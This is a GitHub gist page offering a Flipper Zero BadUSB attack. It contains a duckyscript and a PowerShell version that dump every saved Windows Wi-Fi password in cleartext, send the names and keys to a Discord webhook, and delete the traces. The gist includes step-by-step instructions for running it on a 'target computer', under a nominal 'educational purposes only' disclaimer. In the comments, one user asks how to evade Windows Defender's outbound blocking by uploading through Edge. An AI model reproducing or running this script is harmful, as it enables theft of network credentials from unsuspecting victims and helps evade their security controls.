Skip to content

Instantly share code, notes, and snippets.

@bongobirch

bongobirch/Flipper_WifiPasswordStealer.md

Forked from AlexZeGamer/README.md
Last active August 19, 2025 03:57
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save bongobirch/9facfb04be1547f4eded15a733e07d2d to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save bongobirch/9facfb04be1547f4eded15a733e07d2d to your computer and use it in GitHub Desktop.
Download ZIP
Flipper Zero BadUSB - Wifi password stealer (Discord webhooks)
Raw
Flipper_WifiPasswordStealer.md

⚠️ This script was made for educational purposes only and is not meant to be used maliciously.

This script is a wifi stealer that sends every wifi password stored on a Windows 10/11 computer to a discord webhook.

It is made to be used with a Flipper Zero device, using the BadUSB feature.

Files

Duckyscript files

  • Wifi-Stealer-Discord.txt - A duckyscript version of the script, commented for readability

Usage

Replace https://discord.com/api/webhooks/<channel_id>/<webhook_id> with your own webhook url.

Flipper Zero

  1. Copy the .txt files to the Flipper Zero in the badusb folder, directly to the microSD card or using the Flipper Zero app (Android/iOS) or qFlipper (Windows/Linux/MacOS)
  2. Plug the Flipper Zero to the target computer
  3. Run the script from the Flipper Zero in the Bad USB menu

Result

image

Raw
Wifi-Stealer-Discord.txt
REM This script is a ducky script to be run on a windows machine with a Flipper Zero
REM It contains a powershell script that exports all saved wifi passwords to a discord webhook
REM This script is for educational purposes only
REM This version of the script should work on any duckyscript compatible device
REM However, it was only tested on a Flipper Zero
REM Opening powershell from the run menu
GUI r
DELAY 750
STRING powershell
ENTER
REM Writing the powershell script
REM delay of 2 seconds to make sure powershell is open
DELAY 1000
REM Creating a temporary directory and changing to it
STRING $p="$env:temp\p";md $p >$null;cd $p;
ENTER
REM Exporting all saved wifi passwords to xml files in the temporary directory
STRING netsh wlan export profile key=clear >$null;
ENTER
REM Getting the names and passwords of all the saved wifi networks from the xml files and storing them in a variable
STRING $r=ls|%{$Xml=[xml](gc $_.FullName);[PSCustomObject]@{Name=$Xml.WLANProfile.Name;Password=$Xml.WLANProfile.MSM.Security.SharedKey.KeyMaterial}};
ENTER
REM Creating the body of the discord webhook message (the message is formatted as a Markdown code block to make it easier to read)
STRING $body=@{content="``````"+($r|ft|Out-String)+"``````"} | ConvertTo-Json
ENTER
STRING $url='https://discord.com/api/webhooks/<channel_id>/<webhook_id>'
ENTER
REM Sending the body to the discord webhook
STRING Invoke-RestMethod -Uri $url -Method post -Body $body -ContentType 'application/json' >$null;
ENTER
REM Deleting the temporary directory and exiting powershell
STRING cd ..;rm $p -r -fo;exit;
ENTER
Raw
wifi-stealer-powershell-direct.txt
$p="$env:temp\p";md $p >$null;cd $p;
netsh wlan export profile key=clear >$null;
$r=ls|%{$Xml=[xml](gc $_.FullName);[PSCustomObject]@{Name=$Xml.WLANProfile.Name;Password=$Xml.WLANProfile.MSM.Security.SharedKey.KeyMaterial}};
$body=@{content="``````"+($r|ft|Out-String)+"``````"} | ConvertTo-Json
$url='https://discord.com/api/webhooks/<channel_id>/<webhook_id>'
Invoke-RestMethod -Uri $url -Method post -Body $body -ContentType 'application/json' >$null;
cd ..;rm $p -r -fo;exit;
@expressaccount
Copy link

expressaccount commented Jan 15, 2025

Hi, I tried your script and thought it wouldn't work at first. This is because I have set my Windows Defender to block outgoing traffic, except for the applications I have authorized. But it was just because PowerShell is not allowed to make outgoing calls. Is there a way to run the upload to Discord via the Edge browser, for example? This is enabled by default in Windows Defender. It won't work if someone has removed it, but the probability is quite high.

@Lambda-byte
Copy link

Lambda-byte commented Jan 29, 2025

Hi , the script only return `````` when i try it , what am i missing ? do i have to edit/add something else than my webhook ?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment